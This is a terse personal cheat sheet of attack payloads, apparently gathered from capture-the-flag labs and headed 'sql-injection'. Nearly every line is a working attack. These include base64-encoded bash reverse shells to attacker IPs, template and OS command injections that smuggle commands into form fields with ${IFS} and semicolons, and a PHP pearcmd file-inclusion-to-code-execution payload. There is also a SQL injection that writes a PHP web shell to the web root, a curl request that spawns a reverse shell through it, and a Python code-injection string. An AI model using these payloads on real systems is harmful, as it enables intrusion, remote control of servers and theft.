sql-injection

base64 <<< "bash -i >& /dev/tcp/10.10.14.127/1234 0>&1" | sed 's/\+/\%2b/'
category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xMjcvMTIzNCAwPiYxCg==+|+base64+-d+|+bash");%25>


echo '/bin/sh -i >& /dev/tcp/$KaliIP/$Port 0>&1' | base64
username=user;echo${IFS}'Yourencodedpayload'|base64${IFS}-d|bash;

http://itrc.ssg.htb/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTAvNDQ0NCAwPiYxJw=="));?>+/tmp/hello.php

Brazil' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
curl 10.10.11.116/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.7/4444 0>&1"'


https://nav1n0x.gitbook.io/advanced-sql-injection-techniques


sudo tcpdump -ni tun0 icmp
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;ping+10.10.14.5&dimensions=30x20

')+ str(__import__('os').system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNS8xMzM3IDA+JjE=|base64 -d|bash'))#